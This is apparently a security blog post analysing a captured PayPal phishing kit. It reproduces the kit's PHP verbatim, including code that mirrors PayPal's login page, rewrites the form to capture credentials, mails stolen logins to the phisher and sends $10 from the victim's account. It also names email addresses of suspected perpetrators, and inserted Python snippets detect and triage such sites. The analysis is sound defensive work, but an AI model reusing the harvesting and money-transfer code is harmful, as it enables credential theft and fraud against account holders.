Analysis of Captured Phishing Site

Benjamin Drasin
12 min read · Sep 10, 2014

Note: this article discusses details of code designed for the purpose of committing serious crimes. As a result it deliberately omits some details which make the attack significantly more effective and more difficult to detect, and the links to sites containing malicious code have been omitted or obscured. The author will discuss these details and/or share the malicious code only with persons known to him or recognized members of the security community.

Executive Summary aka TL/DR

Someone sent me a phishing email, attempting to trick me into thinking a malicious site was Paypal. Because of the careless deployment I was able to obtain the source code to the malicious site and analyze it. The app consists of essentially two attacks:

  1. One using libcurl to mirror Paypal’s website in order to steal Paypal login credentials (internal documentation refers to this portion of the app as “K3ylock”, a sort of branding effort I think)
  2. The user is then forwarded to a second set of pages to steal credit card information, and this is done using a more conventional phishing application with local web content.

The overall flow is:

  1. User follows link in phishing email
  2. K3yLock portion of phishing app spoofs user request to Paypal using curl
  3. Phishing app emails user credentials to phisher
  4. App forwards user to second part of app, which harvests credit card info
  5. Phishing app emails credit card info to phisher.

The app was not particularly well written and would not fool a careful and sophisticated user, but is very easy to set up and superficially convincing. The app appears to have been written by a different party than the one who deployed it.

For code insights and details, read on…

Another Day, Another Phisher…

Last week an email arrived in my inbox, one of the half dozen or so to make it through my spam filters that particular day. Purportedly it was a communication from PayPal informing me that my account was “limited”, and that I ought to log in to restore full functionality:

Original phishing email

There are several suspicious details, including:

  • My name not included
  • European address for Paypal vs North America

A quick look at the message source revealed exactly what I expected: the login link did not link to Paypal but rather to another site, and this was a phishing attempt.

At this point I did what I normally do when I get one of these emails:

  1. I logged into Paypal in a separate browser session to confirm that my account was in a normal state
  2. I forwarded the email to the address Paypal provides for security related issues (spoof@paypal.com)

Normally, that would have been that, but in this case, my curiosity got the better of me…

A Closer Look

I took another look at the message source and saw the full link:

Four things stood out to me:

  • The root domain (obscured here) which appeared to be the name of a personal website based on the first-and-last-name of an individual.
  • The URL is plain (unencrypted) http.
  • The long sub-domain name update-your-security-information-for-release-your-limit-account (probably to help obscure the target in the status bar when the user hovers over the link in webmail).
  • The redundant path /webapps/webapps/. This is a mistake that can often happen when setting up a website, where the administrator creates the application root directory and unzips the web application archive into it unaware that the archive itself contains the root directory.

Out of a perverse curiosity, I decided to visit the phishing website. This entailed some risk, as the site was known to be malicious (for all I knew there could be a zero-day exploit hosted there). Therefore, to minimize my risk, I used a private browsing session on a Linux VM that I did not mind losing. And indeed, the site looked exactly like Paypal:

The phishing site impersonating Paypal — note the URL (domain obscured)

Note again the plain http link in the address bar. Given the redundant /webapps/webapps link, I was curious about the parent directory, and that’s where I found it:

That’s right — the phisher had made two other amateur mistakes: leaving directory indexing on, and leaving the original web archive in the root directory after deploying it! Now this was too much to resist, so of course I downloaded the zip file and had a good look.

Application Structure

The phishing application was written in php with a file structure organized by file type (css, js, icon, etc). For reasons not clear to me there is a second web application in the directory “More” which mostly duplicates the structure:

As is normal, the application entry point is the file index.php. A look at the source at once reveals some significant details:

<?php
if(strpos($_SERVER['HTTP_USER_AGENT'],'Google') or strpos($_SERVER['HTTP_USER_AGENT'],'Bot') !== false ) { header('HTTP/1.0 404 Not Found'); exit; }
$ip = $_SERVER['REMOTE_ADDR'];
$random = rand(0,100000000000);
$dst = md5("$random");
//+++++++++++++++++// CREATE FOLDER AND COPY FILE \\+++++++++++++++++\\
function recurse_copy($src,$dst) {
error_log('SRC: ' . $src );
error_log('DST: ' . $dst);
$dir = opendir($src);
@mkdir($dst);
while(false !== ( $file = readdir($dir)) ) {
if (( $file != '.' ) && ( $file != '..' )) {
if ( is_dir($src . '/' . $file) ) {
recurse_copy($src . '/' . $file,$dst . '/' . $file);
}
else {
copy($src . '/' . $file,$dst . '/' . $file);
}
}
}
closedir($dir);
}
$src="KeyLock";
recurse_copy( $src, $dst );
header("location:".$dst."");
?>

The lack of indentation in this code is reproduced verbatim from the original file. The script returns a 404 to bots and to Google’s web crawler, probably to help hide the malicious site. The rest of the code creates a sub-directory with a random name, copies the files from “KeyLock” into it, and then forwards the user to the newly created directory.

This means that every incoming request results in a copy operation and is served from a unique URL. This is why my initial request was redirected to /webapps/webapps/5bd6e1d1760e2f07fd04f01c00e834c. I am not sure of the reason for this; perhaps a unique URL for each attack makes it harder for some tools to detect? Or perhaps it is just confusion or lack of skill on the part of the app developer.
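A host-side check for this deployment pattern, added here as an example and not part of the kit or of the original post: it walks a web root, groups directories whose names look like an md5 hex digest, and reports groups whose contents are identical (each visitor’s copy of KeyLock). The sample tree it builds is constructed; the real site’s paths are not used, and the template file contents are placeholders.

```python
import hashlib
import os
import re
import shutil
import tempfile
from collections import defaultdict

# index.php names each copy md5("$random"): 32 lowercase hex characters
HEX_DIR = re.compile(r"^[0-9a-f]{32}$")


def tree_digest(root):
    """SHA-256 over every file's relative path and contents under root, in a stable order."""
    h = hashlib.sha256()
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            h.update(os.path.relpath(full, root).encode())
            with open(full, "rb") as f:
                h.update(f.read())
    return h.hexdigest()


def find_cloned_dirs(webroot, min_copies=3):
    """Map digest -> sorted hex-named directories with identical contents (groups of >= min_copies)."""
    groups = defaultdict(list)
    for dirpath, dirnames, _ in os.walk(webroot):
        for d in dirnames:
            if HEX_DIR.match(d):
                groups[tree_digest(os.path.join(dirpath, d))].append(os.path.join(dirpath, d))
    return {k: sorted(v) for k, v in groups.items() if len(v) >= min_copies}


def build_sample_webroot():
    """Construct a throwaway web root shaped like the captured deployment (sample data, not the real site)."""
    root = tempfile.mkdtemp(prefix="webapps_")
    template = os.path.join(root, "KeyLock")
    os.makedirs(os.path.join(template, "css"))
    with open(os.path.join(template, "loging.php"), "w") as f:
        f.write("<?php /* placeholder, not the kit's code */ ?>\n")
    with open(os.path.join(template, "css", "style.css"), "w") as f:
        f.write("body {}\n")
    # three per-visitor clones, named the way index.php names them
    for name in ("d41d8cd98f00b204e9800998ecf8427e",
                 "0cc175b9c0f1b6a831c399e269772661",
                 "900150983cd24fb0d6963f7d28e17f72"):
        shutil.copytree(template, os.path.join(root, name))
    os.makedirs(os.path.join(root, "More"))  # unrelated directory, must not be reported
    return root


if __name__ == "__main__":
    for digest, dirs in find_cloned_dirs(build_sample_webroot()).items():
        print("%d identical copies (digest %s...)" % (len(dirs), digest[:12]))
        for d in dirs:
            print("  " + d)
```

The KeyLock template itself shares the digest but is not reported because its name is not a hex digest; a host with many such groups under one customer’s web root is worth a closer look.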

Also of interest is the file zzzEmaiL.php:

<?
///
$send = "root.ahmad@outlook.com"; # <<~ Your Email ~|| #
///
?>

NOTE: I have no way of knowing for sure if root.ahmad@outlook.com is the actual email address of the phisher or merely a placeholder which was later overwritten.

As we will see later, this file is included by other php files to collect stolen information. The suggestion seems to be that the script was written by someone other than the person who deployed it, and the writer added this hook to make it easy for a non-technical deployer to add their own address for collecting harvested data.

Digging a little further

The rubber meets the road in the code contained in the KeyLock directory (which, as mentioned earlier, gets copied into a unique URL for each phishing victim). The request here is handled by another php file which starts like this:

$ip = $_SERVER['REMOTE_ADDR'];
$details = json_decode(file_get_contents("http://ipinfo.io/{$ip}/json"));
$negara = $details->country;
$country = strtolower($negara);
$url = "https://www.paypal.com/{$country}";
$agent = $_SERVER['HTTP_USER_AGENT'];

Here the phisher is looking up publicly available information about the victim based on their IP address, and using it to pick the Paypal site for the victim’s country. The use of “negara” as a variable name is curious; it is the word for country in Indonesian. Most likely this is the author’s native language (subsequently I found what I believe to be the author’s web site, which appears to confirm this assumption).

Continuing on, the phisher now uses curl to make a request for the paypal home page in the user’s country:

global $set;
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT,20);
curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($curl, CURLOPT_REFERER, $url);
curl_setopt($curl, CURLOPT_COOKIE,'PP1.txt');
curl_setopt($curl, CURLOPT_COOKIEFILE,'PP1.txt');
curl_setopt($curl, CURLOPT_COOKIEJAR,'PP1.txt');
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
if ($Follow !== False) {
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
}
$result = curl_exec($curl);
curl_close($curl);

Then, before serving the page to the user, some string replacement takes place:

$get = getStr($_CheckAction, 'class="form-inline ">', 'novalidate="novalidate"');
$check = str_replace("https://www.paypal.com/{$lin}/cgi-bin/webscr?cmd=_login-submit", "loging?cmd=_login-done&login_access=47ed28f8a6d3b738a294", $_CheckAction);
$remo = str_replace($get, '<form action="loging?cmd=_login-done&login_access=47ed28f8a6d3b738a294" method="post" ', $check);

Here the app locates the login form in the fetched page, removes the form’s target URL on paypal.com, and replaces it with the relative URL ‘loging’ plus various parameters. This URL points to another php file in the phishing app. Thus, although the content of the page the app serves was generated by Paypal, when the user enters their username and password the form submits to the phishing app rather than to Paypal.

The Phishing Attack — First Glance

It is in the submission of the login form to loging.php that the actual attack takes place. First the script extracts the username and password from the form:

<?php
///========================// K3yLock \\========================\\\
$date = gmdate("r");
$md5 = md5($date);
$sha1 = sha1($date);
$email = $_POST['login_email'];
$password = $_POST['login_password'];
///===================// Special For $$ K3yLock \\===================\\\
@set_time_limit(0);

I am not yet sure what the purpose is of the sha1 hash constructed from the current date/time.

Again the attacker forwards the request to Paypal, using the provided password/username to log in and send money:

$url='https://www.paypal.com/uk/cgi-bin/webscr?cmd=_send-money&cmd=_send-money&myAllTextSubmitID=&type=external&payment_source=p2p_mktgpage&payment_type=Gift&sender_email='.$email.'&email=gz%40sniper.com&currency=USD&amount=10&amount_ccode=USD&submit.x=Continue&browser_name=Firefox&browser_name=Firefox&browser_version=10&browser_version=11&browser_version_full=10.0.2&browser_version_full=11.0&operating_system=Windows&operating_system=Windows';
global $set;
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT,20);
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31');
curl_setopt($curl, CURLOPT_REFERER, 'https://www.paypal.com/uk/cgi-bin/webscr?cmd=_send-money&cmd=_send-money&myAllTextSubmitID=&type=external&payment_source=p2p_mktgpage&payment_type=Gift&sender_email=sumoniim%40hotmail.com.com&email=gz%40sniper.com&currency=USD&amount=10&amount_ccode=USD&submit.x=Continue&browser_name=Firefox&browser_name=Firefox&browser_version=10&browser_version=11&browser_version_full=10.0.2&browser_version_full=11.0&operating_system=Windows&operating_system=Windows');
curl_setopt($curl, CURLOPT_COOKIE,'PP1.txt');
curl_setopt($curl, CURLOPT_COOKIEFILE,'PP1.txt');
curl_setopt($curl, CURLOPT_COOKIEJAR,'PP1.txt');
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
if ($Follow !== False) {
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
}
$result = curl_exec($curl);
curl_close($curl);

The HTTP_REFERER is curious; ostensibly it is from sending a $10 gift from sumoniim@hotmail.com to gz@sniper.com. I suspect the first email address may be an artifact of the script development, copied from a test or sample code, and the second may be the actual account of the author.

The actual login request does indeed attempt to send $10 from the user’s own account (identified by $email) to gz@sniper.com. This may have been the code author’s way of collecting a “cut” of the action when it is used; as we will see the main function of this app will be to send stolen information to another email address (the one added to zzzEmail.php).

As to what the email address tells us, the domain sniper.com is currently vacant and has been since the early 2000s. From what I can tell of its history it was first an ebay auction sniping site, then a free email site. If my guess is correct, then gz@sniper.com is, or was, the author’s own Paypal account.

Continuing on, the application now emails the user’s credentials to the email address in the file zzzEmaiL.php:

///=====// K3yLock \\=====\\\
$ip = $_SERVER['REMOTE_ADDR'];
$details = json_decode(file_get_contents("http://ipinfo.io/{$ip}/json"));
$country = $details->country;
///=====// $$ K3yLock $$ \\=====\\\
//+++++++++++++++++++++++++++++// ISI PESAN \\+++++++++++++++++++++++++++++\\
$message = "
++========[ SpamZ ReZulT — K3yLock ]========++
.++====[ PayPal ]====++.
Email : ".$email."
Password : ".$password."
.++======[ End ]======++.
.++====[ PC Info ]====++.
IP Info : ".$ip." | ".$country." On ".$date."
Browser : ".$_SERVER['HTTP_USER_AGENT']."
.++======[ End ]======++.
++===[ ^_^ PriVate ScaMPaGe K3yLock ^_^ ]===++
";
//+++++++++++++++++++++++++++++\\ ISI PESAN //+++++++++++++++++++++++++++++\\\
include '../zzzEmaiL.php';
$subject = "PayPal (".$country.") (".$ip.")";
$headers = "From: PayPal Result<paypal-result@spam1927.com>";
mail($send,$subject,$message,$headers);

All comments reproduced verbatim from the original source file (“ISI PESAN” is Indonesian for “message contents”).

Running the Phishing App

To delve further, I set up an environment to run the application. This wasn’t hard; I just installed the necessary packages on my Linux VM (lamp-server, mail, and php5-curl), then unzipped the archive into the web root directory. I replaced the address in zzzEmaiL.php with a local mail address, and voilà! I was running the app locally:

Initial page — note the content exactly duplicates Paypal

I made a few changes to source code to skip the actual submission to Paypal, and entered a fake username/password (blarf and blarfblarf respectively). The result:

Note the different menu style compared to previous screenshot

This is not styled like the current Paypal site; it is serving content from a local php file. The code was updated at least as recently as this year, as the copyright notice reads 2014. An odd feature of this page is that it includes an anti-clickjack script, surely as a result of being copied directly from Paypal at some point in the past.

Next is the second page of a wizard to collect the credit card info:

Submit it and I get an email like this:

In case you are curious, according to Google Translate, “Korban Cabul” translates to “Molest Victims” or “Victims Obscene” in Malay/Indonesian.

Evaluation

All things considered this was not a very sophisticated app. The most interesting code is the use of curl to exactly duplicate Paypal’s main page prior to login. This makes sense from a resource perspective, because stealing the Paypal login credentials is the primary goal and anything else gained would be just a bonus. The most dangerous thing about this app was just how easy it was to install; just drop it in, change one email address and start sending spam directing people to it!

Countermeasures

Given how easy this type of attack is, what are some of the countermeasures which could prevent or mitigate this?

User Education: As with most phishing attempts, there are many things that would tip off a careful and informed user:

  1. The use of unencrypted http for the site. A determined attacker could obtain a certificate, but doing so without revealing their identity would be another hurdle.
  2. The domain name in this case was obviously not Paypal. A more resourceful adversary might have used a domain like paypal.some-other-site.com, paypal.com@some-other-site.com, etc.
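The tells listed here, together with the redundant path and the md5-style directory name noted earlier, as a link-triage routine added as an example (not part of the original post): it splits the URL, works out which part is really the host, and returns the indicators it finds. The registrable-domain logic is a deliberate simplification (last two labels); a real tool would use the public suffix list. The test URLs are constructed, with the phishing root domain replaced by example.com.

```python
import re
from urllib.parse import urlsplit

BRANDS = ("paypal",)
HEX_DIR = re.compile(r"^[0-9a-f]{32}$")  # md5-style directory names, as the kit creates per visitor


def registrable_domain(host):
    """Last two labels of the host. Simplification (assumption): a real tool should use the public suffix list."""
    labels = host.lower().split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def triage_link(url, brands=BRANDS, max_subdomain=30):
    """Return the list of indicators found in url; an empty list means none of these checks fired."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reg = registrable_domain(host)
    sub = host[: len(host) - len(reg)].rstrip(".")  # everything left of the registrable domain
    indicators = []
    if parts.scheme == "http":
        indicators.append("plain http")
    if parts.username is not None:
        # browsers treat text before '@' as userinfo; the real host is what follows it
        indicators.append("userinfo '%s@' before real host %s" % (parts.username, host))
    decoy = sub + " " + (parts.username or "")
    for brand in brands:
        if brand in decoy and brand not in reg:
            indicators.append("brand '%s' appears outside registrable domain %s" % (brand, reg))
    if len(sub) > max_subdomain:
        indicators.append("long subdomain (%d chars)" % len(sub))
    segments = [s for s in parts.path.split("/") if s]
    for first, second in zip(segments, segments[1:]):
        if first == second:
            indicators.append("repeated path segment /%s/%s/" % (first, second))
            break
    if segments and HEX_DIR.match(segments[-1]):
        indicators.append("32-hex-char directory name in path")
    return indicators


if __name__ == "__main__":
    # constructed examples; the phishing root domain from the article is replaced by example.com
    for u in ("http://update-your-security-information-for-release-your-limit-account.example.com"
              "/webapps/webapps/deadbeefdeadbeefdeadbeefdeadbeef/",
              "https://paypal.com@some-other-site.com/",
              "https://www.paypal.com/us/cgi-bin/webscr?cmd=_login-submit"):
        print(u, "->", triage_link(u) or ["no indicators"])
```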

Take down malicious web sites: The site in question here was offline four days after I received the email, presumably as a result of action from Paypal.

Pursue code author — phishing site operator: Difficult and in this case would probably require international law enforcement activity. Paypal probably couldn't do this alone.

Who are they?

Every indication is that a separate party wrote the code from the one who deployed it. There may have been still another person responsible for generating the spam email directing me to the site. I will refer to these parties as the Author, the Phisher, and the Spammer respectively although it is possible that the Spammer is the same person as the Phisher.

Author

As a result of this investigation I have identified what is likely the author’s website based on similar code, programming idioms, and language. I will not link to it here because it contains code built for the purpose of committing crimes. However just based on what we have seen here we can say some things about this party:

  • Moderately skilled php developer, probably wrote the app alone
  • Possible email/paypal account gz@sniper.com
  • Indonesian speaker, and therefore probably resident in Indonesia

Phisher

  • Not at all experienced with deploying web applications — made several significant mistakes.
  • Likely domain owner/administrator of phishing domain.
  • Possible employee of LowestDomainRates.com (who registered and administered the domain)
  • Possible email addresses:
      • root.ahmad@outlook.com (from zzzEmaiL.php in webapps root)
      • cs@tomyachmad.net (from zzzEmaiL.php in More root)
      • charles@ldservice.com (from whois information on the web domain in question)

Spammer

Not much to go on here. The email apparently originated with host ded4851.axc.nl. Todo: Check Whois information, check netcraft for how long ded4851.axc.nl and www.axc.nl have been up, look up Phpmailer to see if there is a web interface running on either domain, etc.

Odds and Ends

  • I obtained the whois information for the phishing domain, which indicated that the site was registered to an individual in Florida in 2010. Unless the owner has lost the ability to control the DNS for the root domain, he or she will have been responsible for the creation of the phishing subdomain. I had suspected that the domain had lapsed and been acquired by a malicious entity but I see no evidence that this took place.
  • The application contains what I can only describe as a “branding” effort on the part of the developer, using “KeyLock” and “K3yLock” for directory names and in the email containing the stolen credentials.
  • A code snippet which is very similar to the script which steals the user’s credentials can be found on PHP Decode, a site for analyzing malicious or obfuscated php:
    http://www.unphp.net/decode/4d122dc12a6eadfdea6b754c45c75886/
  • Four days after I received the original email, both the phishing site as well as the site at the root domain were no longer online (returned 404 error). I do not know whether or not this was the result of any action I or Paypal took.

Benjamin Drasin

Software Professional, current areas of interest include Application Security, Web Services, and Software Architecture